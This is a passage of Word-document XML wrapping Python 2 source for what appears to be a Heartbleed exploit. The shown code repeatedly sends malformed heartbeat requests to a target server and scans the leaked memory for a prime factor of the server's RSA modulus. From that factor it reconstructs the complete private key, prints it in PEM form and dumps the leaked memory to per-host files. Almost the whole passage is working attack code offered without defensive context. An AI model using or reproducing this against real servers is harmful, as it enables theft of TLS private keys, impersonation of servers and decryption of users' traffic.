        <w:t xml:space="preserve"> heartbeat request...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA1C7B0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="22768262" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.stdout.flush</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37749C1B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0F957B9F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B444FF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="42C7DA5B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keyfound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0810A84F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="02158A9C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.extractkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F734716" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="547AC440" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hit_hb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(s, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstrun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, supported)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C7B102" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7BDE4076" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if res == '':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185BEB8D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="19683D4B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F041B25" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6B923D6B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keyfound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>extractkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, res, modulus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B300C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="337F3811" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3296B9BF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5B60987F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">            res += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hit_hb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(s, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstrun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, supported)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C71E40" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="28E0361F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8917EE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7267E90A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keyfound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17640DD6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="74737F1D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE07A78" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="77C6F5AD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CBF4DF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="797DCEC6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.stdout.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rPlease</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> wait... connection attempt ' + str(x+1) + ' of ' + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7271DF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4387603D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.stdout.flush</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B83D10A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4AF72E0B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AE4BCB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="449E5E86" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        print '\n##################################################################'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9D01DD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="445D4431" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        print       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490DDB86" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="33AB87B6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56821766" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="57C88C6E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C032C6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3F68B577" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F066069" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="22AD6F3E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">       print "Error! " + str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729161DB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4E640193" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">       print '##################################################################'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9D3758" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="43612E18" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">       print               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023223C4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5892CFE6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="133E7F27" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5FA0C86B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>extractkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, chunk, modulus):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36359520" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="40A6C7D0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="594C5293" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6008AD56" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    #print "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nChecking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for private key...\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EEB793" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2C055B7E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    n = int (modulus, 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6493C97D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="14A59CA6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keysize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>n.bit_length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() / 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307756C9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6D49259F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2A354557" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="58B1E8C1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    for offset in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xrange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (0, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (chunk) - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keysize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3B1F43" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="432B1D70" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        p = long (''.join (["%02x" % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ord</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (chunk[x]) for x in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xrange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (offset + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keysize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - 1, offset - 1, -1)]).strip(), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68153231" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="10338035" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmpy.is_prime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (p) and p != n and n % p == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CA3524" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="42656F49" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B08C1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4D3BA7A8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                print '\n\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nFound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> prime: ' + str(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049BC62E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="670E86A2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            e = 65537</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334FF056" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1CC3D3E8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            q = n / p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA53BC2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="20F2381A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            phi = (p - 1) * (q - 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075F00E2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="62B1A3DC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            d = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmpy.invert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (e, phi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E80CE2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="08430B67" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = d % (p - 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1924F8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="52ABFA8F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = d % (q - 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB83032" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="771DA562" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qinv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmpy.invert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (q, p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475E9BC9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="138B392D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            seq = Sequence()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1D2DF1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7D785209" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            for x in [0, n, e, d, p, q, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qinv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF01B29" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="154E98FD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>seq.setComponentByPosition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (seq), Integer (x))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034FD205" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2838AE75" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            print "\n\n-----BEGIN RSA PRIVATE KEY-----\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>n%s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-----END RSA PRIVATE KEY-----\n\n" % base64.encodestring(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encoder.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (seq))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21899187" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="35A0BC6A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privkeydump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = open("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-certs/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_" + host + ".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "a")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7268F636" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3FBA6F4D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privkeydump.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(chunk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4CB636" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0FF71C46" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            return True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16045737" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3F928BC8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
